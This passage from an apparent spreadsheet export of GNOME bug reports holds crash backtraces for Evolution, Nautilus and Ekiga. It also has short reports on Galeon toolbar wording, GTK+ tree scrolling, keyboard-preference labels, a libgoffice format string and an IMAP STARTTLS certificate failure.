    instance_and_params=0xbffff1c0) at gsignal.c:2436
	tmp = (Handler *) 0x415d7c3f
	handler = (Handler *) 0x833e180
	accumulator = (SignalAccumulator *) 0x80c2cc0
	emission = {next = 0x0 instance = 0x87f4ca8 ihint = {signal_id = 42
    detail = 0 run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN 
  chain_type = 4}
	class_closure = (GClosure *) 0x80c29f8
	hlist = (HandlerList *) 0x87f2e30
	handler_list = (Handler *) 0x833e180
	return_accu = (GValue *) 0xbfffeff0
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 42
	max_sequential_handler_number = 20044
	return_value_altered = 0
#16 0x415cc12f in g_signal_emit_valist (instance=0x87f4ca8
signal_id=42 
    detail=0 
    var_args=0xbffff350 \200Ã³Ã¿Â¿Â¸ \n\b\210Ã³Ã¿Â¿N&gt;$AP\026\030\bÂ¸
\n\b\001)
    at gsignal.c:2205
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	error = (gchar *) 0x0
	rtype = 20
	static_scope = 0
	instance_and_params = (GValue *) 0xbffff1c0
	stack_values = {{g_type = 135796304 data = {{v_int = 142560424 
        v_uint = 142560424 v_long = 142560424 v_ulong = 142560424 
        v_int64 = 142560424 v_uint64 = 142560424 v_float =
7.68263802e-34 
        v_double = 7.0434207954961944e-316 v_pointer = 0x87f4ca8} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 135014440 data = {{v_int = 134992600 v_uint = 134992600
        v_long = 134992600 v_ulong = 134992600 v_int64 = 134992600 
        v_uint64 = 134992600 v_float = 4.20766366e-34 
        v_double = 6.6695206102789058e-316 v_pointer = 0x80bd2d8} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 3221221912 data = {{
        v_int = 1096641659 v_uint = 1096641659 v_long = 1096641659 
        v_ulong = 1096641659 v_int64 = 578931321667939451 
        v_uint64 = 578931321667939451 v_float = 13.8389845 
        v_double = 5.862550176905619e-270 v_pointer = 0x415d6c7b} {
        v_int = 134792816 v_uint = 134792816 v_long = 134792816 
        v_ulong = 134792816 v_int64 = 4429760112 v_uint64 =
4429760112 
        v_float = 4.11592735e-34 v_double = 2.1885922906570726e-314 
        v_pointer = 0x808c670}}} {g_type = 0 data = {{v_int = 0
v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 4294967296 v_uint64 =
4294967296 
        v_float = 0 v_double = 2.1219957909652723e-314 v_pointer =
0x0} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 =
4294967297 
        v_uint64 = 4294967297 v_float = 1.40129846e-45 
        v_double = 2.121995791459338e-314 v_pointer = 0x1}}} {
    g_type = 134792816 data = {{v_int = 134792952 v_uint = 134792952
        v_long = 134792952 v_ulong = 134792952 
        v_int64 = -4611701102217738504 v_uint64 = 13835042971491813112
        v_float = 4.1159898e-34 v_double = -1.996650725730829 
        v_pointer = 0x808c6f8} {v_int = 1096646997 v_uint =
1096646997 
        v_long = 1096646997 v_ulong = 1096646997 
        v_int64 = 607193993182019925 v_uint64 = 607193993182019925 
        v_float = 13.8440752 v_double = 4.4197171907903414e-268 
        v_pointer = 0x415d8155}}} {g_type = 134792816 data = {{
        v_int = -1073745336 v_uint = 3221221960 v_long = -1073745336
        v_ulong = 3221221960 v_int64 = 7516189256 v_uint64 =
7516189256 
        v_float = -1.99958134 v_double = 3.7134908990306784e-314 
        v_pointer = 0xbffff248} {v_int = 141373272 v_uint = 141373272
        v_long = 141373272 v_ulong = 141373272 
        v_int64 = 4706448544900132696 v_uint64 = 4706448544900132696 
        v_float = 7.13752456e-34 v_double = 4368400.1316641197 
        v_pointer = 0x86d2f58}}} {g_type = 3221221992 data = {{
        v_int = 1096647396 v_uint = 1096647396 v_long = 1096647396 
        v_ulong = 1096647396 v_int64 = 578915928505156324 
        v_uint64 = 578915928505156324 v_float = 13.8444557 
        v_double = 5.8496105436242425e-270 v_pointer = 0x415d82e4} {
        v_int = 134789216 v_uint = 134789216 v_long = 134789216 
        v_ulong = 134789216 v_int64 = 4429756512 v_uint64 =
4429756512 
        v_float = 4.11427431e-34 v_double = 2.1885905120207476e-314 
        v_pointer = 0x808b860}}} {g_type = 0 data = {{v_int = 0
v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 578926785085833216 
        v_uint64 = 578926785085833216 v_float = 0 
        v_double = 5.858736684536794e-270 v_pointer = 0x0} {
        v_int = -1073745288 v_uint = 3221222008 v_long = -1073745288
        v_ulong = 3221222008 v_int64 = 4704638000221385336 
        v_uint64 = 4704638000221385336 v_float = -1.99958706 
        v_double = 3438251.4999983869 v_pointer = 0xbffff278}}} {
    g_type = 1096645695 data = {{v_int = 134789216 v_uint = 134789216
        v_long = 134789216 v_ulong = 134789216 
        v_int64 = -4611700758620358560 v_uint64 = 13835043315089193056
        v_float = 4.11427431e-34 v_double = -1.996727019675312 
        v_pointer = 0x808b860} {v_int = 1096641659 v_uint =
1096641659 
        v_long = 1096641659 v_ulong = 1096641659 
        v_int64 = 578915928505150587 v_uint64 = 578915928505150587 
        v_float = 13.8389845 v_double = 5.8496105436194199e-270 
        v_pointer = 0x415d6c7b}}} {g_type = 134789216 data = {{v_int =
1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1
        v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 
        v_pointer = 0x1} {v_int = 141373368 v_uint = 141373368 
        v_long = 141373368 v_ulong = 141373368 v_int64 = 4436340664 
        v_uint64 = 4436340664 v_float = 7.13756864e-34 
        v_double = 2.1918435153309445e-314 v_pointer = 0x86d2fb8}}} {
    g_type = 1 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1
        v_int64 = 578915274573479937 v_uint64 = 578915274573479937 
        v_float = 1.40129846e-45 v_double = 5.8490608426821594e-270 
        v_pointer = 0x1} {v_int = 134789368 v_uint = 134789368 
        v_long = 134789368 v_ulong = 134789368 
        v_int64 = -4611700552461928200 v_uint64 = 13835043521247623416
        v_float = 4.1143441e-34 v_double = -1.9967727960425332 
        v_pointer = 0x808b8f8}}} {g_type = 1096646997 data = {{
        v_int = 134790064 v_uint = 134790064 v_long = 134790064 
        v_ulong = 134790064 v_int64 = 578915274708270000 
        v_uint64 = 578915274708270000 v_float = 4.11466369e-34 
        v_double = 5.8490609559879179e-270 v_pointer = 0x808bbb0} {
        v_int = -1073745208 v_uint = 3221222088 v_long = -1073745208
        v_ulong = 3221222088 v_int64 = 7516189384 v_uint64 =
7516189384 
        v_float = -1.9995966 v_double = 3.713490962271081e-314 
        v_pointer = 0xbffff2c8}}} {g_type = 134792088 data = {{
        v_int = 1096718384 v_uint = 1096718384 v_long = 1096718384 
        v_ulong = 1096718384 v_int64 = -4611700414061045712 
        v_uint64 = 13835043659648505904 v_float = 13.9121552 
        v_double = -1.9968035272118065 v_pointer = 0x415e9830} {
        v_int = 1096647396 v_uint = 1096647396 v_long = 1096647396 
        v_ulong = 1096647396 v_int64 = 583240685694321380 
        v_uint64 = 583240685694321380 v_float = 13.8444557 
        v_double = 1.1398547912004439e-269 v_pointer = 0x415d82e4}}}
{
    g_type = 134686900 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 1 v_uint64 = 1 v_float =
1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1} {v_int =
0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
4706448544758759424 
        v_uint64 = 4706448544758759424 v_float = 0 v_double = 4368400
        v_pointer = 0x0}}} {g_type = 3221222152 data = {{v_int =
1095485946 
        v_uint = 1095485946 v_long = 1095485946 v_ulong = 1095485946
        v_int64 = 4710057396419676666 v_uint64 = 4710057396419676666 
        v_float = 12.7368107 v_double = 7729405.0202507917 
        v_pointer = 0x414bc9fa} {v_int = 134686900 v_uint = 134686900
        v_long = 134686900 v_ulong = 134686900 
        v_int64 = -4611700208864646988 v_uint64 = 13835043864844904628
        v_float = 4.06729311e-34 v_double = -1.9968490899650932 
        v_pointer = 0x80728b4}}} {g_type = 1096641659 data = {{
        v_int = 135796304 v_uint = 135796304 v_long = 135796304 
        v_ulong = 135796304 v_int64 = 578475830835418704 
        v_uint64 = 578475830835418704 v_float = 4.57670644e-34 
        v_double = 5.4796604213118006e-270 v_pointer = 0x8181650} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 
        v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 20
	param_values = (GValue *) 0xbffff1d4
	node = (SignalNode *) 0x80c2a48
	i = 1
	n_params = 1
#17 0x415cc3ff in g_signal_emit (instance=0x87f4ca8 signal_id=42
detail=0)
    at gsignal.c:2239
	var_args = 0xbffff34c Ã˜Ã’\v\b\200Ã³Ã¿Â¿Â¸
\n\b\210Ã³Ã¿Â¿N&gt;$AP\026\030\bÂ¸ \n\b\001
#18 0x41244076 in gtk_widget_event_internal (widget=0x87f4ca8
event=0x80bd2d8)
    at gtkwidget.c:3563
	signal_num = 20
	return_val = 0
#19 0x41243bae in gtk_widget_event (widget=0x87f4ca8 event=0x80bd2d8)
    at gtkwidget.c:3369
No locals.
#20 0x41126270 in gtk_propagate_event (widget=0x87f4ca8
event=0x80bd2d8)
    at gtkmain.c:2344
	tmp = (GtkWidget *) 0x84ffaa4
	handled_event = 0
#21 0x41124d6c in gtk_main_do_event (event=0x80bd2d8) at gtkmain.c:1567
	event_widget = (GtkWidget *) 0x87f4ca8
	grab_widget = (GtkWidget *) 0x87f4ca8
	window_group = (GtkWindowGroup *) 0x82e2230
	next_event = (GdkEvent *) 0x0
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = (GList *) 0x414a6f2b
#22 0x414d5766 in gdk_event_dispatch (source=0x8096758 callback=0 
    user_data=0x0) at gdkevents-x11.c:2133
	display = (GdkDisplay *) 0x808b758
	event = (GdkEvent *) 0x80bd2d8
#23 0x4161954d in g_main_dispatch (context=0x80967a0) at gmain.c:1895
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0x414d56ed 
	was_in_call = 0
	user_data = 0x0
	callback = 0
	cb_funcs = (GSourceCallbackFuncs *) 0x0
	cb_data = 0x0
	need_destroy = 1073841184
	source = (GSource *) 0x8096758
	depth = (gint *) 0x80a0618
	i = 0
#24 0x4161a8b9 in g_main_context_dispatch (context=0x80967a0) at
gmain.c:2441
No locals.
#25 0x4161adec in g_main_context_iterate (context=0x80967a0 block=1 
    dispatch=1 self=0x8077318) at gmain.c:2522
	max_priority = 0
	timeout = 0
	some_ready = 1
	nfds = 8
	allocated_nfds = 13
	fds = (GPollFD *) 0x81563c8
#26 0x4161b643 in g_main_loop_run (loop=0x80b9dd0) at gmain.c:2726
	self = (GThread *) 0x8077318
#27 0x407cb9ff in bonobo_main () at bonobo-main.c:297
	loop = (GMainLoop *) 0x80b9dd0
#28 0x0806688a in main (argc=1 argv=0xbffff7d4) at main.c:589
	options = {{longName = 0x806e3f2 component shortName = 99 'c' 
    argInfo = 1 arg = 0x8070844 val = 0 
    descrip = 0x806e400 Start Evolution activating the specified
component 
    argDescrip =</t>
  </si>
  <si>
    <t>GALEON-84577</t>
  </si>
  <si>
    <t>throbber should be spinner</t>
  </si>
  <si>
    <t>: galeon.schemas.in.h:116
msgid 
Icons to show in the toolbar. Possible values are 0 (new) 1 (back) 2 (up) 
3 (forward) 4 (reload) 5 (home page) 6 (stop) 7 (go button) 8 (zoom) 9 
(drag handle) 10 (location entry box) 11 (throbber) 12 (seperator) 13 
(find in page) 14 (bookmarks) 15 (history) 16 (print) 17 (back history) 
18 (forward history) 19 (clear location) 20 (link menu).
Shouldn't throbber be spinner?</t>
  </si>
  <si>
    <t>GNOME-SESSION-437209</t>
  </si>
  <si>
    <t>Show icon in splash screen for autostarted applications</t>
  </si>
  <si>
    <t>This is related to bug 105557 (which is about session-saved applications)</t>
  </si>
  <si>
    <t>NAUTILUS-511601</t>
  </si>
  <si>
    <t>[obsolete] GIO</t>
  </si>
  <si>
    <t>nautilus crashed with SIGSEGV in g_str_hash()</t>
  </si>
  <si>
    <t>This bug has been reported here:
.
Thread 3 (process 7674):
#0  0x00007fb8459e15cb in read () from /lib/libpthread.so.0
#1  0x00007fb846abc36d in child_watch_helper_thread (data=)
    at /build/buildd/glib2.0-2.15.3/glib/gmain.c:3909
	b = B '\0' 
	list = (GSList *) 0x7fb8459dddd0
#2  0x00007fb846ae14d4 in g_thread_create_proxy (data=0x8be5b0) at /build/buildd/glib2.0-2.15.3/glib/gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#3  0x00007fb8459da3f7 in start_thread () from /lib/libpthread.so.0
#4  0x00007fb84574995d in clone () from /lib/libc.so.6
#5  0x0000000000000000 in ?? ()
.
Thread 2 (process 8061):
#0  0x00007fb8459dee1d in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#1  0x00007fb8473ff809 in g_cond_timed_wait_posix_impl (cond=0x810e64 entered_mutex=0x1 abs_time=)
    at /build/buildd/glib2.0-2.15.3/gthread/gthread-posix.c:242
	result = 
	end_time = {tv_sec = 1201112975 tv_nsec = 582928000}
	__PRETTY_FUNCTION__ = g_cond_timed_wait_posix_impl
#2  0x00007fb846a9a233 in g_async_queue_pop_intern_unlocked (queue=0x80d490 try=0 end_time=0x455f80c0)
    at /build/buildd/glib2.0-2.15.3/glib/gasyncqueue.c:364
	retval = 
	__PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#3  0x00007fb846ae31b1 in g_thread_pool_thread_proxy (data=)
    at /build/buildd/glib2.0-2.15.3/glib/gthreadpool.c:220
	task = (gpointer) 0x16a20f0
	pool = (GRealThreadPool *) 0x80d430
#4  0x00007fb846ae14d4 in g_thread_create_proxy (data=0x131dc10) at /build/buildd/glib2.0-2.15.3/glib/gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#5  0x00007fb8459da3f7 in start_thread () from /lib/libpthread.so.0
#6  0x00007fb84574995d in clone () from /lib/libc.so.6
#7  0x0000000000000000 in ?? ()
.
Thread 1 (process 7666):
#0  IA__g_str_hash (v=0x0) at /build/buildd/glib2.0-2.15.3/glib/gstring.c:95
	h = 0
#1  0x00007fb846aae8a1 in IA__g_hash_table_lookup (hash_table=0x10b3b00 key=0x0)
    at /build/buildd/glib2.0-2.15.3/glib/ghash.c:118
	node = 
	__PRETTY_FUNCTION__ = IA__g_hash_table_lookup
#2  0x00000000004b8457 in get_link_files (target_file=) at nautilus-file.c:1484
	uri = 0x0
#3  0x00000000004b88b2 in update_links_if_target (target_file=0x0) at nautilus-file.c:1498
	link_files = 
	p = 
#4  0x00000000004b911f in update_info_internal (file=0xc2ee70 info=0x0 update_name=1) at nautilus-file.c:1803
	node = (GList *) 0x0
	changed = 1
	is_symlink = 
	is_hidden = 
	is_backup = 
	is_mountpoint = 
	has_permissions = 
	permissions = 
	can_read = 1
	can_write = 1
	can_execute = 1
	can_delete = 1
	can_trash = 1
	can_rename = 1
	can_mount = 0
	can_unmount = 0
	can_eject = 
	thumbnailing_failed = 
	uid = 
	gid = 
	size = 
	sort_order = 
	atime = 
	mtime = 
	ctime = 1201112871
	symlink_name = 
	mime_type = 
	selinux_context = 0x0
	name = 0x0
	thumbnail_path = 
	file_type = 
	icon = 
	old_activation_location = 
	activation_uri = 
#5  0x00000000004bb614 in nautilus_file_new_from_info (directory=0x7f3710 info=0x1548580) at nautilus-file.c:475
	file = (NautilusFile *) 0xc2ee70
	mime_type = 
	__PRETTY_FUNCTION__ = nautilus_file_new_from_info
#6  0x000000000049ecd2 in dequeue_pending_idle_callback (callback_data=)
    at nautilus-directory-async.c:888
	directory = (NautilusDirectory *) 0x7f3710
	pending_file_info = (GList *) 0x1518920
	node = (GList *) 0x1518920
	next = 
	file = (NautilusFile *) 0x0
	changed_files = (GList *) 0x0
	added_files = (GList *) 0x0
	file_info = (GFileInfo *) 0x1548580
	mimetype = 
	name = 
	dir_load_state = (DirectoryLoadState *) 0x0
#7  0x00007fb846abb3e4 in IA__g_main_context_dispatch (context=0x796870) at /build/buildd/glib2.0-2.15.3/glib/gmain.c:2064
No locals.
#8  0x00007fb846abe6f5 in g_main_context_iterate (context=0x796870 block=1 dispatch=1 self=)
    at /build/buildd/glib2.0-2.15.3/glib/gmain.c:2697
	got_ownership = 
	max_priority = 200
	timeout = 0
	some_ready = 1
	nfds = 
	allocated_nfds = 
	fds = (GPollFD *) 0x15b61f0
	__PRETTY_FUNCTION__ = g_main_context_iterate
#9  0x00007fb846abea15 in IA__g_main_loop_run (loop=0x7d6cd0) at /build/buildd/glib2.0-2.15.3/glib/gmain.c:2905
	got_ownership = 1167967248
	self = (GThread *) 0x74a500
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#10 0x00007fb848507803 in IA__gtk_main () at /build/buildd/gtk+2.0-2.12.5/gtk/gtkmain.c:1163
	tmp_list = (GList *) 0x7d6cd0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x7918a0
	loop = (GMainLoop *) 0x7d6cd0
#11 0x000000000043d942 in main (argc= argv=0x7fff52de07d8) at nautilus-main.c:571
	kill_shell = 0
	restart_shell = 0
	no_default_window = 0
	browser_window = 0
	no_desktop = 0
	startup_id = 
	startup_id_copy = 0x7d6cd0 phy
	session_to_load = 0x0
	geometry = (gchar *) 0x0
	remaining = (const gchar **) 0x0
	perform_self_check = 0
	context = (GOptionContext *) 0xe00003
	application = (NautilusApplication *) 0x7918a0
	program = (GnomeProgram *) 0x76a850
	options = {{long_name = 0x4f33e7 check short_name = 99 'c' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x7fff52de05e8 description = 0x4f3410 Perform a quick set of self-check tests. arg_description = 0x0} 
  {long_name = 0x4f69a7 geometry short_name = 103 'g' flags = 0 arg = G_OPTION_ARG_STRING 
    arg_data = 0x7fff52de05d8 description = 0x4f3440 Create the initial window with the given geometry. 
    arg_description = 0x4f325e GEOMETRY} {long_name = 0x4f3267 no-default-window short_name = 110 'n' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0x7fff52de05f4 
    description = 0x4f3478 Only create windows for explicitly specified URIs. arg_description = 0x0} {
    long_name = 0x4f3279 no-desktop short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x7fff52de05ec 
    description = 0x4f34b0 Do not manage the desktop (ignore the preference set in the preferences dialog). 
    arg_description = 0x0} {long_name = 0x4f592a browser short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x7fff52de05f0 description = 0x4f3284 open a browser window. arg_description = 0x0} {
    long_name = 0x4f33ef quit short_name = 113 'q' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x7fff52de05fc 
    description = 0x4f329b Quit Nautilus. arg_description = 0x0} {long_name = 0x4f33f6 restart 
    short_name = 0 '\0' flags = 1 arg = G_OPTION_ARG_NONE arg_data = 0x7fff52de05f8 
    description = 0x4f32aa Restart Nautilus. arg_description = 0x0} {long_name = 0x4f7d56  short_name = 0 '\0' 
    flags = 0 arg = G_OPTION_ARG_STRING_ARRAY arg_data = 0x7fff52de05d0 description = 0x0 
    arg_description = 0x4f32bc [URI...]} {long_name = 0x4ef8e4 load-session short_name = 108 'l' flags = 0 
    arg = G_OPTION_ARG_STRING arg_data = 0x7fff52de05e0 
    description = 0x4f3508 Load a saved session from the specified file. Implies \--no-default-window\. 
    arg_description = 0x4f32c5 FILENAME} {long_name = 0x0 short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x0 description = 0x0 arg_description = 0x0}}
#12 0x00007fb8456901c4 in __libc_start_main () from /lib/libc.so.6
#13 0x000000000042d069 in _start ()</t>
  </si>
  <si>
    <t>EVOLUTION-209855</t>
  </si>
  <si>
    <t>STARTTLS</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.13.99
Synopsis: Failed SSL connection to IMAP server or SMTP
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Create an IMAP email account tick the SSL box. The account fails to
connect to the IMAP server as it is failing in the starttls phase with a
certificate error.
Sep 13 21:16:55 neuron imapd-ssl: starttls: accept: error:14094412:SSL
routines:SSL3_READ_BYTES:sslv3 alert bad certificate
The IMAP server is a courier-imapd with openSSL version 0.9.6 (24 Sep
2000)
Unknown reporter: jason@alteredminds.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>GTK+-66269</t>
  </si>
  <si>
    <t>gtk-demo: Bad scrolling in GtkTreeStore demo</t>
  </si>
  <si>
    <t>Bad scrolling in GtkTreeStore demo.
1. Open GtkTreeStore demo of gtk-demo.
2. Scroll down to the very end.
3. Press 'December' node to collapse it.
The 'December' node is collapsed but scrolled down so it's not visible
now. I assume it should not be hidden right after collapsing.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-97824</t>
  </si>
  <si>
    <t>RepeatKeys settings are unclear</t>
  </si>
  <si>
    <t>The keyboard preferences control panel in gnome 2.0_beta2_06 has labels
that
don't explain the Repeat Keys settings very understandably - they simply
say Delay and Speed.  There is plenty of room for more descriptive
labels that
much better explain the settings such as Delay before key starts to
repeat
and Rate of auto-repeat (or something - perhaps HCI can give you better
descriptions).</t>
  </si>
  <si>
    <t>LIBGOFFICE-500393</t>
  </si>
  <si>
    <t>#.00EE00 format is broken</t>
  </si>
  <si>
    <t>This is the format string you obtain in the graph guru when selecting Scientific format + Use superscript + Don't show 1x's.
For example it should display 10Â¹ instead of 1.00x10Â¹.</t>
  </si>
  <si>
    <t>EKIGA-419259</t>
  </si>
  <si>
    <t>crash in Ekiga Softphone: trying to contact sip:50...</t>
  </si>
  <si>
    <t>Version: 2.0.4
What were you doing when the application crashed?
trying to contact sip:500@ekiga.net
Distribution: Slackware Slackware 11.0.0
Gnome Release: 2.16.3 2007-02-06 (www.gware.org)
BugBuddy Version: 2.16.1
System: Linux 2.6.17.13 #1 PREEMPT Sat Dec 2 20:14:27 CET 2006 i686
X Vendor: The X.Org Foundation
X Vendor Release: 60900000
Selinux: No
Accessibility: Disabled
Memory status: size: 78020608 vsize: 0 resident: 78020608 share: 0 rss: 28680192 rss_rlim: 0
CPU usage: start_time: 1174122803 rtime: 0 utime: 268 stime: 0 cutime:132 cstime: 0 timeout: 136 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/ekiga'
(no debugging symbols found)
Using host libthread_db library /lib/tls/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1248979264 (LWP 3063)]
[New Thread -1280357456 (LWP 3109)]
[New Thread -1278747728 (LWP 3108)]
[New Thread -1280095312 (LWP 3107)]
[New Thread -1279636560 (LWP 3106)]
[New Thread -1278485584 (LWP 3095)]
[New Thread -1278223440 (LWP 3094)]
[New Thread -1275499600 (LWP 3093)]
[New Thread -1274901584 (LWP 3084)]
[New Thread -1266512976 (LWP 3076)]
[New Thread -1249621072 (LWP 3072)]
[New Thread -1249358928 (LWP 3071)]
0xb64b074a in poll () from /lib/tls/libc.so.6
#0  0xb64b074a in poll () from /lib/tls/libc.so.6
#1  0xb736d8d6 in g_main_context_acquire () from /usr/lib/libglib-2.0.so.0
#2  0xb736dc6a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#3  0xb7a9de33 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#4  0x08088eb2 in PList::Clone ()
#5  0xb6405e14 in __libc_start_main () from /lib/tls/libc.so.6
#6  0x080649f1 in ?? ()
Thread 12 (Thread -1249358928 (LWP 3071)):
#0  0xb654cfd9 in __lll_mutex_lock_wait () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb6549e94 in _L_mutex_lock_160 () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
Thread 11 (Thread -1249621072 (LWP 3072)):
#0  0xb64b2d57 in ___newselect_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb71b7383 in PHouseKeepingThread::Main ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#2  0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#3  0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 10 (Thread -1266512976 (LWP 3076)):
#0  0xb64b074a in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb736d8d6 in g_main_context_acquire () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0xb736dc6a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb78060e0 in e_book_set_default_source () from /usr/lib/libebook-1.2.so.9
No symbol table info available.
#4  0xb7388bd9 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 9 (Thread -1274901584 (LWP 3084)):
#0  0xb64b074a in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb736d8d6 in g_main_context_acquire () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0xb736dc6a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb74bd820 in link_thread_io_context () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#4  0xb7388bd9 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 8 (Thread -1275499600 (LWP 3093)):
#0  0xb64b23a4 in ioctl () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb57a38b6 in PVideoInputDevice_V4L::GetFrameDataNoDelay ()
   from /usr/lib/pwlib/devices/videoinput/v4l_pwplugin.so
No symbol table info available.
#2  0xb57a352c in PVideoInputDevice_V4L::GetFrameData ()
   from /usr/lib/pwlib/devices/videoinput/v4l_pwplugin.so
No symbol table info available.
#3  0xb7089a07 in PVideoInputDevice::GetFrame ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#4  0x08094f9c in PPluginServiceDescriptor::GetPluginAPIVersion ()
No symbol table info available.
#5  0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#6  0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 7 (Thread -1278223440 (LWP 3094)):
#0  0xb64b2d57 in ___newselect_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb71b86ae in PThread::PXBlockOnIO ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#2  0xb71a616b in PChannel::PXSetIOBlock ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#3  0xb719d2c1 in PSocket::os_accept ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#4  0xb71c6d39 in PTCPSocket::Accept ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#5  0xb68a5a3f in OpalListenerTCP::Accept ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#6  0xb68a4004 in OpalListener::ListenForConnections ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#7  0xb68ac693 in OpalListener::ListenForConnections_PNotifier::Call ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#8  0xb71d0c74 in PSimpleThread::Main ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#9  0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#10 0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#11 0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread -1278485584 (LWP 3095)):
#0  0xb64b2d57 in ___newselect_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb719f83b in PSocket::Select () from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#2  0xb71c7f87 in PSocket::Select () from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#3  0xb68aad31 in OpalListenerUDP::Accept ()
